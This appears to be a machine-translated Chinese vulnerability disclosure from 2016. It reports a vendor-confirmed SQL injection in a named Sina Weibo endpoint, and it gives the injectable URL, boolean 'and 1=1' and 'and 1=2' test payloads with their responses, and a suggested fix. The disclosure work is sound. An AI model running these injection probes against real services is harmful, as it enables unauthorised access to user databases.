漏洞标题 新浪微博某处SQL注入漏洞 相关制造商 新浪微博 漏洞作者 过路人 提交时间 2016-05-25 15: 27 公共时间 2016-07-10 17: 50 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 字符类型注入,数据库帐户权限太高,Mysql 漏洞详细信息 注射点:http://ting.weibo.com/movieapp/emotion/getversion?display=1 http://ting.weibo.com/movieapp/emotion/getversion?display=1和1=1 返回 {'status': 1,'message':'ok','data':'59'} http://ting.weibo.com/movieapp/emotion/getversion?display=1%20and%201=2 返回 {'status': 1,'message':'ok'} 大部分是注射。 事实证明它实际上是一种获取类型。
当前数据库和用户
漏洞证明: 我没有过多地发布207个musiclib表。 修理计划: 过滤参数。 版权声明:请注明出处。居民A @乌云